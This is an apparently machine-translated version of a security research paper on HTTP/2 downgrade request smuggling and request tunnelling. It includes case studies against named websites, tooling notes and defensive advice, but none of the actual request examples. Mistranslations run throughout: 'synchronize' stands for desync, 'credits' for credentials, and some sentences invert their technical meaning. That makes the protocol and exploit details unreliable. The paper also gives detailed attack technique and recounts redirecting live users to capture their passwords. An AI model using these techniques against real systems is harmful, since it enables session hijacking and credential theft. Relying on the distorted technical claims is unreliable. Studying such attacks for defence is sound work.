Prove your skills with the world's leading penetration testing toolkit.
Prove your skills with the world's leading penetration testing toolkit.
Prove your skills with the world's leading penetration testing toolkit.
HTTP/2 can easily be mistaken for a transport layer protocol that can be exchanged without the security of the website behind it being zero. In this article, I will introduce a variety of new HTTP/2-specific threat categories caused by implementation flaws and RFC flaws.
I will first show how these flaws enable HTTP/2 exclusivity to synchronize attacks. The case study targets well-known websites that are supported by servers such as Amazon's application load balancer to WAF, CDN, and large technology customization stacks. These achieve significant impact by hijacking the client, poisoning the cache, and stealing credentials to obtain multiple maximum bounties.
After that, I will launch novel techniques and tools to crack the request tunnel driven by desync-a widespread but overlooked variant of request smuggling that is often mistaken for false positives. Finally, I will share multiple new exploit primitives introduced by HTTP/2, exposing new server layer and application layer attack surfaces.
This research paper is accompanied by a presentation by Black Hat USA and DEF CON, and a recording will be embedded on this page soon. It can also be used as a printable white paper. This paper is completely focused on technical details-if you want to know more about the research process, please check the presentation:
The first step in using HTTP/2 is to learn the basics of the protocol. Fortunately, there is less to learn than you think.
I started this research by writing an HTTP/2 client from scratch, but I came to the conclusion that for the attacks described in this article, we can safely ignore many low-level functional details, such as frames and streams.
Although HTTP/2 is complicated, it is designed to transmit the same information as HTTP/1.1. This is the equivalent request expressed in the two agreements.
Assuming you are already familiar with HTTP/1, then you only need to understand three new concepts.
In HTTP/1, the first line of the request contains the request method and path. HTTP/2 replaces the request line with a series of pseudo headers. These five pseudo-headers are easy to identify because they are indicated by a colon at the beginning of the name:
HTTP/1 is a text-based protocol, so it uses string manipulation to parse requests. For example, the server needs to look up the colon to know when the header name ends. There may be ambiguities in this method, which makes desynchronization attacks possible. HTTP/2 is a binary protocol similar to TCP, so the parsing is based on a predefined offset and is not prone to ambiguity. This article uses human-readable abstractions instead of actual bytes to represent HTTP/2 requests. For example, online, pseudo-header names actually map to a single byte-they don't actually contain a colon.
In HTTP/1, the length of each message body is indicated by the Content-Length or Transfer-Encoding header.
In HTTP/2, these headers are redundant because each message body consists of a data frame with a built-in length field. This means that there is little ambiguity about the length of the message, and it may make you wonder how to use HTTP/2 for desynchronization attacks. The answer is HTTP/2 downgrade.
HTTP/2 degradation means that the front-end server communicates with the client HTTP/2, but the request is rewritten to HTTP/1.1 before forwarding the request to the back-end server. This protocol conversion supports a series of attacks, including HTTP request smuggling:
Typical request smuggling vulnerabilities are mainly due to differences between the front-end and back-end on whether to derive the length of the request from its content length (CL) or transfer encoding (TE) header. Depending on how this out-of-sync occurs, the vulnerability is classified as CL.TE or TE.CL.
Frontends that use HTTP/2 almost always use the built-in message length of HTTP/2. However, the backend that receives the downgrade request does not have access to this data and must use the CL or TE header. This leads to two main types of vulnerabilities: H2.TE and H2.CL.
We have now covered enough theories to start exploring some real loopholes. In order to find these, I implemented automatic detection in HTTP Request Smuggler, and used an adapted version of the H1-desync detection strategy based on timeout. After implementation, I used it to scan my website pipeline with bug bounty program. Unless otherwise stated, all vulnerabilities cited have been patched, and more than 50% of the total revenue from the bug bounty has been donated to local charities.
The following sections assume that readers are familiar with HTTP request smuggling. If you find any explanation is insufficient, I suggest you read or watch HTTP Desync Attacks: Request Smuggling Reborn, and deal with our Web Security Academy Lab.
Due to the HTTP/2 data frame length field, the Content-Length header is not required. However, the HTTP/2 RFC states that this header is allowed, provided it is correct. For our first case study, we will target www.netflix.com, the front end used by the site to perform HTTP downgrades without verifying the content length. This enables H2.CL to synchronize.
To take advantage of it, I made the following HTTP/2 request:
After downgrading this request to HTTP/1.1 on the front end, it encounters the back end, which looks like:
Due to the incorrect Content-Length, the backend stopped processing the request early, and the orange data was regarded as the beginning of another request. This allows me to add arbitrary prefixes to the next request, regardless of who sent it.
I made an orange prefix to trigger the response and redirect the victim's request to my server 02.rs:
Netflix traced this vulnerability to Netty through Zuul, and it has now been patched and tracked as CVE-2021-21295. Netflix received the highest bonus-$20,000.
Next, let us look at a simple H2.TE to synchronize. RFC status
A connection-specific header field is the transfer encoding. The Amazon Web Services (AWS) application load balancer failed to comply with this line and accepted the request containing Transfer-Encoding. This means that I can use H2.TE to sync to use almost all the websites that use it.
One vulnerable website is Verizon's law enforcement access portal, located at id.b2b.oath.com. I took advantage of it with the following request:
The front end downgrades this request to:
This should look familiar-H2.TE development is very similar to CL.TE. After downgrading, the "Transfer Encoding: Chunking" header, which is easily overlooked by the front-end server, takes precedence over the content length inserted by the front-end. This makes the backend stop parsing the request body early and allows us to redirect any user to my site on psres.net.
When I reported this incident, the categorizer asked for more evidence that I might cause harm, so I started redirecting real-time users, and soon discovered that I found people in the OAuth login flow, leaking through the Referer header Their password:
Verizon offered a reward of $7,000 for this discovery.
I encountered a similar vulnerability with different exploit paths on accounts.athena.aol.com-CMS that supports various news sites, including Huffington Post and Engadget. Here, I can make an HTTP/2 request again, and after being downgraded, it will hit the backend and inject a prefix to redirect the victim to my domain:
Again, the shunt wanted more evidence, so I took this opportunity to redirect some real-time users. However, this time, redirecting the user resulted in a request to my server, which was actually "Can I send you my credentials?":
I hurriedly configured my server to grant them permissions:
And received a series of beautiful credits:
This showed some interesting browser behaviors that I needed to explore later, and also earned another $10,000 from Verizon.
I also reported the root vulnerability directly to Amazon, and they have patched the Application Load Balancer, so their customer’s website is no longer affected. Unfortunately, they do not have a bug bounty program that is easy to research.
Every website that uses Imperva Cloud WAF is also vulnerable to attacks, which continues the long tradition of web application firewalls and makes websites more vulnerable to hackers.
Since HTTP/1 is a plain text protocol, it is impossible to put some key characters for parsing in certain positions. For example, you cannot put the \r\n sequence in the header value-you will only end the header in the end.
The binary design of HTTP/2, combined with the way it compresses the header, enables you to put any character in any position. It is expected that the server will re-impose HTTP/1 style restrictions through additional verification steps:
Naturally, many servers skip this verification step.
A vulnerable implementation is Netlify CDN, which enables H2.TE to synchronize attacks on every website based on it, including the start.mozilla.org start page of Firefox. I made a vulnerability using'\r\n' in the header value:
During the downgrade process, \r\n triggered a request header injection vulnerability and introduced an additional header: Transfer-Encoding: chunked
This triggered H2.TE to go out of sync, and its prefix was designed to allow victims to receive malicious content from my own Netlify domain. Thanks to Netlify's caching settings, harmful responses will be saved and continuously provided to anyone else trying to access the same URL. In fact, I can completely control every page of every site on the Netlify CDN. The total prize money for this award is US$4,000.
Atlassian's Jira appears to have similar vulnerabilities. I created a simple proof of concept designed to trigger two different responses-a normal response and the robots.txt file. The actual result is another matter entirely:
The server started sending me a response that was specifically targeted at other Jira users, including a lot of sensitive information and PII.
The root cause is a small optimization I made when making the payload. I decided that instead of using \r\n to smuggle the Transfer-Encoding header, I would use double-\r\n to terminate the first request and let me include my malicious prefix directly in the header:
This method avoids the need for block encoding, message body, and POST method. However, it fails to explain the key steps in the HTTP downgrade process-the front end must terminate the header with the sequence \r\n\r\n. This causes it to terminate the prefix, turning it into a complete independent request:
The backend did not see 1.5 requests as usual, it saw 2 requests. I received the first response, but the next user received a response to my smuggling request. Then the response they should receive is sent to the next user, and so on. In fact, the front end began to provide each user with a response to the previous user's request indefinitely.
To make matters worse, some of them contain Set-Cookie headers, which continuously log users into other users’ accounts. After deploying the patch, Atlassian chose to globally expire all user sessions.
@defparam mentioned this potential impact in the actual attack using HTTP request smuggling, but I think the generality is underestimated. For obvious reasons, I haven't tried it on many real-time sites, but as far as I know, this exploit path is almost always possible. Therefore, if you find a request for smuggling loopholes and the supplier will not take it seriously without more evidence, then the two smuggling requests should provide them with the evidence they are looking for.
The front end that makes Jira vulnerable is PulseSecure Virtual Traffic Manager. Atlassian received $15,000-three times the maximum bonus.
In addition to Netlify and PulseSecure Virtual Traffic Manager, this technology is also applicable to some other servers. We worked with the Computer Emergency Response Team (CERT) and found that F5's Big-IP load balancer also has a vulnerability-for more details, please refer to consultation K97045220. It also applies to Imperva Cloud WAF.
While waiting for PulseSecure's patch, Atlassian tried some patches. The first one does not allow line breaks in the header value, but fails to filter the header name. This is easy to exploit because the server can tolerate colons in header names-this is not possible in HTTP/1.1:
The original patch also failed to filter pseudo-headers, resulting in request line injection vulnerabilities. Taking advantage of these is simple, just visualize where the injection occurs and make sure that the generated HTTP/1.1 request has a valid request line:
The last flaw in the patch is to prevent the classic error of'\r\n' instead of'\n' itself-the latter is almost always sufficient to be exploited.
Next, let's take a look at some things that are not so flashy, not so obvious, but still dangerous. In this research, I noticed that a subcategory of desync vulnerabilities was largely ignored due to lack of knowledge on how to identify and exploit it. In this section, I will explore the theory behind it and then solve these problems.
Whenever the front end receives a request, it must decide whether to route it to the back end via an existing connection or establish a new connection to the back end. The connection reuse strategy adopted by the front-end can have a significant impact on which attacks you can successfully launch.
Most front-ends are happy to send any request over any connection, thus achieving the cross-user attacks we have already seen. However, sometimes you will find that your prefix only affects requests from your own IP. This happens because the front end uses a separate connection to the back end for each client IP. This is a bit troublesome, but you can usually solve it by attacking other users indirectly through cache poisoning.
Some other frontends enforce a one-to-one relationship between the connection from the client and the connection to the backend. This is a stricter limit, but conventional cache poisoning and internal header leakage techniques still apply.
When the front end chooses to never reuse the connection with the back end, life becomes very challenging. It is impossible to send a request that directly affects subsequent requests:
This leaves an exploit primitive: request tunneling. The primitive may also come from other methods, such as H2C smuggling, but this section will focus on asynchronously driven tunnels.
It is easy to detect the request tunnel-the usual timeout technique works fine. The first real challenge is to confirm vulnerabilities-you can confirm regular request smuggling vulnerabilities by sending a series of requests and seeing whether earlier requests affect later requests. Unfortunately, this technique always fails to confirm the request tunnel, so it is easy to mistake the vulnerability for a false positive.
We need a new confirmation technology. An obvious way is to simply smuggle a complete request and see if you get two responses:
Unfortunately, the response shown here does not actually tell us that the server is vulnerable! Concatenating multiple responses is exactly how HTTP/1.1 keep-alive works, so we don't know whether the front end thinks it is sending us one response (and vulnerable to attack) or two (and safe). Fortunately, HTTP/2 cleverly solves this problem for us. If you see the HTTP/1 header in the HTTP/2 response body, you just discovered that you are out of sync:
Due to the second problem, this method is not always effective. The front-end server usually uses the Content-Length on the back-end response to determine how many bytes to read from the socket. This means that even if you can make two requests to the backend and trigger two responses from them, the frontend will only pass you the first response that is not very interesting
In the following example, the orange 403 response is never delivered to the user due to the Content-Length highlighted:
Sometimes persistence can replace insight. Bitbucket is easily attacked by blind tunnels. After more than four months of repeated efforts, I was lucky to find a solution. The response from the endpoint was so big that Burp Repeater lags slightly, so I decided to shorten it by switching my method from POST to HEAD. This effectively requires the server to return the response headers, but omits the response body:
Sure enough, this caused the backend to only provide response headers...including the Content-Length header of the undelivered body! This makes the frontend overread and provide a partial response to the second smuggling request:
Therefore, if you suspect a blind request tunnel vulnerability, try HEAD and see what happens. Due to the time-sensitive nature of socket reading, it may require multiple attempts, and you will find it easier to read the smuggled response provided quickly. This means that invalid smuggling requests are more suitable for detection:
Smuggling an invalid request will also cause the backend to close the connection, avoiding the possibility of accidental response queue poisoning. Note that if the target is only vulnerable to tunnel attacks, it is impossible to poison the response queue, so you don't need to worry. Sometimes, when HEAD fails, other methods such as OPTIONS, POST, or GET will work. I have added this technology to HTTP Request Smuggler as a detection method.
Request tunneling allows you to use completely unprocessed requests from the front end to reach the back end. The most obvious use path is to use it to bypass front-end security rules such as path restrictions. However, you often find that there are no relevant rules that can be bypassed. Fortunately, there is a second option.
The front-end server usually injects internal headers for key functions, such as specifying the user's login identity. Since the front end detects and rewrites them, attempts to directly utilize these headers usually fail. You can use request tunneling to bypass this rewriting and successfully smuggle internal headers.
There is a problem-attackers usually cannot see internal headers, and it is difficult to exploit headers whose names you don't know. To help, I just released an update to Param Miner that adds support for guessing internal header names through request tunnels. As long as the server's internal header is in Param Miner's wordlist and causes a noticeable difference in the server's response, Param Miner should detect it.
Custom internal headers that are not present in Param Miner’s static vocabulary or leaked in site traffic may evade detection. Conventional request smuggling can be used to make the server leak its internal headers to the attacker, but this method is not suitable for request tunneling.
Fortunately, if you can inject line breaks in headers via HTTP/2, there is another way to discover internal headers. The classic desync attack relies on making the two servers inconsistent at the end of the request body, but using line breaks we can cause disagreements about the beginning of the body!
In order to get the internal headers used by bitbucket, I made the following request:
After downgrading, it looks like:
Can you see what I did here? Both the front-end and the back-end think I sent a request, but they are confused about where the body starts. The front end thinks that's=cow' is part of the header, so the internal header is inserted after this. This means that the backend ends up treating the internal headers as part of the's' POST parameters that I send to the Wordpress search function...and reflects them back:
Accessing different paths on bitbucket.org will cause my request to be routed to different backends and leak different headers:
Since we only trigger a single response from the backend, this technique will work even if the request tunnel vulnerability is blind.
Finally, if the stars are aligned, you may be able to use tunnels for more powerful web cache poisoning. You need a scenario where the request tunnel is obtained through H2.X desync, the HEAD technology is effective, and there is a cache. This will allow you to use HEAD to poison the cache by mixing and matching harmful responses created by arbitrary headers and body.
Using this technique, after six months of dealing with an apparently useless vulnerability, I gained permanent control of every page on bitbucket.org
Next, let's look at some HTTP/2 exploit primitives. This section provides complete case studies, but each one is based on the behavior I observed on real websites and will give you a certain foothold in your goals.
In HTTP/1, duplicate headers are useful for a series of attacks, but it is impossible to send requests using multiple methods or paths. HTTP/2's decision to replace request lines with pseudo-headers means that this is now possible. I have observed that real servers that accept multiple :path headers, and the server implementations are inconsistent in the :path they handle:
In addition, although HTTP/2 introduced the :authority header to replace the Host header, the Host header is still technically allowed. In fact, as far as I know, both are optional. This creates ample opportunities for Host-header attacks, such as:
Another HTTP/2 feature that cannot be ignored is the scheme pseudo-header. This value is'http' or'https', but it supports arbitrary bytes.
Some systems, including Netlify, use it to construct URLs without performing any verification. This allows you to overwrite the path and in some cases poison the cache:
Others use this scheme to construct URLs to which requests are routed, thereby creating SSRF vulnerabilities.
Unlike the other techniques used in this article, these vulnerabilities will work even if the target is not downgraded to HTTP/2.
You will find that some servers do not allow you to use line breaks in title names, but allow colons. Due to the trailing colon appended during the downgrade, this rarely enables complete desynchronization:
It is more suitable for Host-header attacks, because Host should contain a colon, and the server usually ignores everything after the colon:
I did find a server where the header name splitting is enabled for out of sync. In the test, the vulnerability disappeared and the server banner reported that they had updated their Apache front end. In order to track down the vulnerability, I installed an old version of Apache locally. I can't replicate this problem, but I did find other problems.
Apache's mod_proxy allows spaces in the :method to enable request line injection. If the backend server tolerates trailing spam in the request line, this allows you to bypass the blocking rules:
I reported this issue to Apache on May 11, and they confirmed it within 24 hours, retained CVE-2021-33193, and said that this issue will be fixed in 2.4.49. Unfortunately, at the time of publication of this white paper-86 days after Apache received the vulnerability notification-2.4.49 has not yet been released, so although there is a patch on the master, this is actually a zero-day vulnerability. The patch version was subsequently released on September 16.
HTTP/1.1 used to have a lovely feature called line folding. You can put a \r\n followed by a space in the header value, and the subsequent data will be "folded".
This is the same request sent normally:
This feature was later deprecated, but many servers still support it.
If you find that the HTTP/2 front end of a website allows you to send header names that start with a space, and the back end supports line breaks, you can tamper with other headers, including internal headers. This is an example where I tampered with the internal header request ID, it is harmless, but the backend reflects this:
Many front ends do not sort incoming headers, so you will find that by moving the space header, you can tamper with different internal and external headers.
Before closing, let's take a look at some of the pitfalls and challenges you may encounter when using HTTP/2.
Since HTTP/2 and HTTP/1 share the same TCP port, the client needs some way to determine which protocol to use. When using TLS, most clients use HTTP/1 by default, and only use HTTP/2 when the server explicitly announces support for HTTP/2 through the ALPN field during the TLS handshake. Some servers that support HTTP/2 forget to advertise this fact, causing clients to only talk to them about HTTP/1 and hiding a valuable attack surface.
Fortunately, this is easy to detect-just ignore ALPN and try to send an HTTP/2 request. You can scan this scene using HTTP Request Smuggler, Burp Scanner, or even curl:
HTTP/2 puts a lot of effort into supporting multiple requests on a single connection. However, there are a few common implementation quirks to be wary of.
Some servers treat the first request on each connection differently, which may cause the vulnerability to appear intermittently or even completely lost. On other servers, sometimes requests can break the connection without causing the server to disconnect it, which silently affects the way all subsequent requests are processed.
If you find any of these problems, you can use the "Enable HTTP/2 connection reuse" option in Burp Repeater and the requestsPerConnection setting in Turbo Intruder to mitigate them.
This research was made possible because of the substantial investment in the development of offensive HTTP/2 toolkits. The binary format of HTTP/2 means that you cannot use classic common tools such as netcat and openssl. The complexity of HTTP/2 means that you cannot easily implement your own client, so you need to use a library. The existing library does not have the basic ability to send users a request in the wrong format. This also excludes curling.
I started this research by writing my own streamlined open source HTTP/2 stack from scratch and integrating it into Turbo Intruder. To call it, change engine=Engine.THREADED to engine=Engine.HTTP2. It takes HTTP/1.1 format requests as input, and then rewrites them to HTTP/2. During the rewrite, it will perform some character mapping on the title to ensure that all the techniques used in this presentation are available:
You can also override pseudo headers by specifying them as fake HTTP/1.1 headers. Here is an example of using the aforementioned Apache vulnerability:
Turbo Intruder's HTTP/2 stack is currently not very tolerant of abnormal server behavior. If you find that it is not suitable for a certain target, I suggest you try Burp Suite's native HTTP/2 stack. This is tested in more actual combat, you can call it from Turbo Intruder through Engine.BURP2.
To help you scan for these vulnerabilities, I released a major update of HTTP Request Smuggler. This tool finds all the case studies mentioned in this article. I also made sure that Burp Suite's scanner can detect these vulnerabilities. Please note that many of these features rely on the new API introduced in Burp Suite Pro/Community 2020.8. The exception is Turbo Intruder's HTTP/2 stack, which can even be used as a command line tool or library.
I also helped to integrate HTTP/2-exclusive attack support directly into Burp Suite. Burp Suite has provided basic support for H/2 for about a year, through the H/1 style view, which performs basic normalization (such as lowercase title names) to prevent valid H/1 requests from being converted to invalid H/2 ask.
The H/1 style view is convenient for conventional attacks that are not related to the protocol, so we leave it roughly as it is, but steps have been taken to make the normalization visible.
However, many H/2 proprietary attacks cannot be expressed in H/1 style syntax, so we added support for these attacks in Burp Suite 2021.8 through the Inspector sidebar. The Inspector view can now accurately represent H/2 requests, including pseudo-headers, and allows you to perform advanced attacks such as using line breaks in the header or spaces in the path. If the request cannot be expressed at all using H/1 style syntax, we declare it as'kettled' (not my idea!) and hide the H/1 view.
For more information, see Burp's HTTP/2 release notes and HTTP/2 documentation.
If you are setting up a web application, avoid HTTP/2 downgrade-this is the root cause of most of these vulnerabilities. Instead, use HTTP/2 end-to-end.
If you are writing an HTTP/2 server, especially a server that supports downgrading, please enforce the character set restrictions that exist in HTTP/1-refusal to include newlines in headers, colons in header names, spaces in request methods And other requests. In addition, please note that the specification does not always clearly state where the vulnerability may occur. Certain unmarked requirements, if skipped, will cause serious loopholes in your feature server. There may also be some strengthening opportunities in the RFC.
It is recommended that web developers get rid of the assumption of inheritance from HTTP/1. Historically, it has been possible to escape without extensive verification of certain user input (such as request methods), but HTTP/2 has changed this.
We plan to launch a cybersecurity academy theme for this research soon, which contains multiple laboratories to help you consolidate your understanding and gain practical experience using real websites. If you want to be notified as soon as you are ready, please consider following us on Twitter.
For another view of HTTP/2-driven request smuggling, I recommend Emil Lerner's HTTP Request Smuggling via Higher HTTP Versions.
For another explanation of HTTP response queue poisoning, please check @defparam's Practical Attack Using HTTP Request Smuggling
We have seen that the complexity of HTTP/2 has led to shortcuts to server implementation, insufficient offensive tools, and poor risk awareness.
Through novel tools and research, I have shown that many websites suffer from severe HTTP/2 request smuggling vulnerabilities due to widespread HTTP/2 downgrades. I also showed that in addition to request smuggling, the power and flexibility of HTTP/2 can achieve various other attacks that HTTP/1 cannot.
Finally, I introduced practical techniques to enable request tunnel detection and utilization, especially in the presence of HTTP/2.